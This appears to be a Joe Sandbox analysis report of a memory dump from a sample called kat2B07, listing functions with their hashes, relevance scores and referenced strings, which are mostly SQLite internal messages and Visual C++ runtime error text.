Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
API String ID: 0-1404816483
Opcode ID: 656a7260131eebddaa7102f991c5a06936c1a8904599cd1fb6b5eddb6e5759b3
Instruction ID: c105dcdee5698ed5d72428d98ce1f8211fba48e058f0d514a67521055892b646
Opcode Fuzzy Hash: 656a7260131eebddaa7102f991c5a06936c1a8904599cd1fb6b5eddb6e5759b3
Instruction Fuzzy Hash: A0313875608309ABD3105F69EC40B6BB7D8EF81227F024669FE5897211EB76F81087E3

Function 1D7BC650 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

PRAGMA %Q.data_version, xrefs: 1D7BC67C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.data_version
API String ID: 0-2870853266
Opcode ID: a2f1164be5fff331bb0c7945e99d2f11fbd0ba915d1d81465c82535b0db55654
Instruction ID: deaa61877f2a271d0720b2fbbdd7de0fb4f9591c69cd3d06484053cb8bf3b1f1
Opcode Fuzzy Hash: a2f1164be5fff331bb0c7945e99d2f11fbd0ba915d1d81465c82535b0db55654
Instruction Fuzzy Hash: D111C6BAB043059FD700DE29FC40596F7E5EF88236F55453AEA4482611E736B81D8BA3

Function 1D769CD0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D769CFB
API called with finalized prepared statement, xrefs: 1D769CE5
%s at line %d of [%.10s], xrefs: 1D769D00
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D769CF1

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3620335220
Opcode ID: 466b5078724de853d9c856d4990998cee93370c04376bb4c28d1eb0c30007268
Instruction ID: 14b54851cfee0275b97404493f914a5ba8789064a354560209744e1c70781b31
Opcode Fuzzy Hash: 466b5078724de853d9c856d4990998cee93370c04376bb4c28d1eb0c30007268
Instruction Fuzzy Hash: B011EB6AA04661A6E7115A29FC44BEB73989BC157EF01007BEE49D6212F710B88542F3

Function 1D7E31F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8fa9ab1684d0b498cce94413eb12abe2e66aa6f738011bb9a1295f3933c8bb
Instruction ID: 25b9f217e85fee7596eb4c9599451692a82ee17c761a79fa1f779d01e65eff41
Opcode Fuzzy Hash: af8fa9ab1684d0b498cce94413eb12abe2e66aa6f738011bb9a1295f3933c8bb
Instruction Fuzzy Hash: D9F1F471A083419FD701CF28D88077ABBE0BF452B6F54466EE8998B352D336E945CB93

Function 1D764E00 Relevance: 9.2, APIs: 6, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb94665e7093b0115b187a042fa885e06008d89943150a2620147e3c07d18bfd
Instruction ID: aec048e736596dabf9f5b7f37c346f74f9299fd56b9ce0d83049d28d94748667
Opcode Fuzzy Hash: bb94665e7093b0115b187a042fa885e06008d89943150a2620147e3c07d18bfd
Instruction Fuzzy Hash: 85817C715082119BE700DF28D884B6A77F4FF817A9F44056AFD449B251E73AE518CBB3

Function 1D8673E0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 369COMMON

Download Yara Rule

Strings

SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 1D86776D
ase, xrefs: 1D86768D
sqlite_master, xrefs: 1D8673FD
sqlite_temp_master, xrefs: 1D8673F2

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
API String ID: 0-231581592
Opcode ID: 2952bc8ffadfdb705aac92b176db0b093292b2c2e4342b4d2089aa1701c4ef2c
Instruction ID: ef3b1cfaad111759200797ff1dbb612121ea4634543f57fb93c91a9fc77103f6
Opcode Fuzzy Hash: 2952bc8ffadfdb705aac92b176db0b093292b2c2e4342b4d2089aa1701c4ef2c
Instruction Fuzzy Hash: 94E1D3B4A08341ABDB01DF29C880B6AB7E4BF45724F05455CFA489B652F771E984CBE3

Function 1D756DA0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 364COMMON

Download Yara Rule

Strings

recursively defined fts5 content table, xrefs: 1D756DE2

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: recursively defined fts5 content table
API String ID: 0-437020801
Opcode ID: 61d80fca683e4648899f91c50e4d85c3b221e7a20fa80164e9e7b0d077b9f3f3
Instruction ID: 07768c0a0a12830b555325ba90ffd64a4dbbb2477f87b2636ebb0242fa5b84fa
Opcode Fuzzy Hash: 61d80fca683e4648899f91c50e4d85c3b221e7a20fa80164e9e7b0d077b9f3f3
Instruction Fuzzy Hash: F8D1BC759083418FDB04CF19E48076ABBE1FF89324F854A5FE8898B252D775E885CB93

Function 1D7D6180 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

NEAR, xrefs: 1D7D642A
fts5: syntax error near "%.*s", xrefs: 1D7D6436
fts5 expression tree is too large (maximum depth %d), xrefs: 1D7D6349
expected integer, got "%.*s", xrefs: 1D7D648D

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: NEAR$expected integer, got "%.*s"$fts5 expression tree is too large (maximum depth %d)$fts5: syntax error near "%.*s"
API String ID: 0-2846580575
Opcode ID: b925798923c507dc3f464d9e45e522633160a4d54ab3c4e08fae90979f0ddfdf
Instruction ID: 8683552b01cdd0e7da7cebf69f703fa5c93bd0884c65605f3abcf4f28654ab47
Opcode Fuzzy Hash: b925798923c507dc3f464d9e45e522633160a4d54ab3c4e08fae90979f0ddfdf
Instruction Fuzzy Hash: 1AC1A3F990470AEFC7518F64C940B6EF7A8FF08724F058A19E5455B252E371F660CBA2

Function 1D76C0F0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 276COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D76C124, 1D76C16F
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D76C115, 1D76C160
database corruption, xrefs: 1D76C11F, 1D76C16A

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 8370c73584c75d50d60ef65cac87d75a29f285283808bfa23f6302763e147395
Instruction ID: 4d46eaeb2a0040b1d93c753a81cdc044c6f1a9613b2d2089f871edb09eaa72e3
Opcode Fuzzy Hash: 8370c73584c75d50d60ef65cac87d75a29f285283808bfa23f6302763e147395
Instruction Fuzzy Hash: F7A19FB5A083019BD704DF59D880A6ABBE1FFC8624F49456EFD4897212E731E905CBA3

Function 1D7DE4B0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 218COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D7DE58E, 1D7DE5C1
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7DE57F, 1D7DE5B2
database corruption, xrefs: 1D7DE589, 1D7DE5BC

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: a465a168d6d86d7be2c4dc7145767f54dc61f7eb86a7c428b4897fd30075b0cd
Instruction ID: 1dedb4b0681412c1c8b719415f06d7cd1822c33bbb6cdfb41a5004db69887136
Opcode Fuzzy Hash: a465a168d6d86d7be2c4dc7145767f54dc61f7eb86a7c428b4897fd30075b0cd
Instruction Fuzzy Hash: 05711571604755AFC341DF29DC81ABABBE0EF40225F45496EE9D9C3241E324FA58C7A3

Function 1D770970 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 207COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D770AA0, 1D770B82
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D770A91, 1D770B73
database corruption, xrefs: 1D770A9B, 1D770B7D

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 54b77380b5f256ece8117f86d73eabc8343a7c84aafdb997a0188d2075b03113
Instruction ID: 6c8d900e50ed83d205fa399f34235af6d6137ce0b09381776fd8b49123072a91
Opcode Fuzzy Hash: 54b77380b5f256ece8117f86d73eabc8343a7c84aafdb997a0188d2075b03113
Instruction Fuzzy Hash: E861D5797042208FCB05DF18DC88E6677F4FB88724F4609AAED499B362D771E944CB92

Function 1D83ABF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 204COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D83AE18
unable to delete/modify user-function due to active statements, xrefs: 1D83AD61
%s at line %d of [%.10s], xrefs: 1D83AE1D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D83AE0E

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 20abacd8548c550ef2127df5e1dfbd76eb73df7926e7801dca42a33e93e53e1b
Instruction ID: 1828ad8c71798cd1d52b602dd0971d7552984f32c424217248bd47eb7bceb4d1
Opcode Fuzzy Hash: 20abacd8548c550ef2127df5e1dfbd76eb73df7926e7801dca42a33e93e53e1b
Instruction Fuzzy Hash: 5C51A072A08344BFD7148F15DC80B6BF7E9EF89756F14492DF68A97251E322D8018BA3

Function 1D73A230 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 201COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D73A469, 1D73A4A7
%s at line %d of [%.10s], xrefs: 1D73A46E, 1D73A4AC
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D73A45F, 1D73A49D

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: b4abfd04842ea777c123101df63dbc3c64db6411bb5a73052dd9e50cc6b35d86
Instruction ID: acb9e47d37457043b90db4ead20624e86a0d8c0f54253488ced042aadc41e2c5
Opcode Fuzzy Hash: b4abfd04842ea777c123101df63dbc3c64db6411bb5a73052dd9e50cc6b35d86
Instruction Fuzzy Hash: 59710570A04341BFD715DF28D846BABB7E4AF8531AF05442EE5998B243E731E445C793

Function 1D74A860 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

bytecode, xrefs: 1D74A96E
argument to %s() is not a valid SQL statement, xrefs: 1D74A97C
tables_used, xrefs: 1D74A973, 1D74A97B
stmt-pointer, xrefs: 1D74A928

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
API String ID: 0-361449301
Opcode ID: 9a06ceef8d8bc2ee5f671fdf0fa275ab5f09039ea2d17451823c809b08350771
Instruction ID: b155b2922fc5ba324597e0da0aa960ad5b77f6373d8813f39f7192c6cc965147
Opcode Fuzzy Hash: 9a06ceef8d8bc2ee5f671fdf0fa275ab5f09039ea2d17451823c809b08350771
Instruction Fuzzy Hash: ED61F3715043029FE7119F24C98576377F4FF45328F21892EE9868B241E776E548CBA3

Function 1D732AF4 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,1D9794C2,00000104), ref: 1D92EFDB

Strings

..., xrefs: 1D92F029
Microsoft Visual C++ Runtime Library, xrefs: 1D92F070
<program name unknown>, xrefs: 1D92EFEA
Runtime Error!Program: , xrefs: 1D92EFA7

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
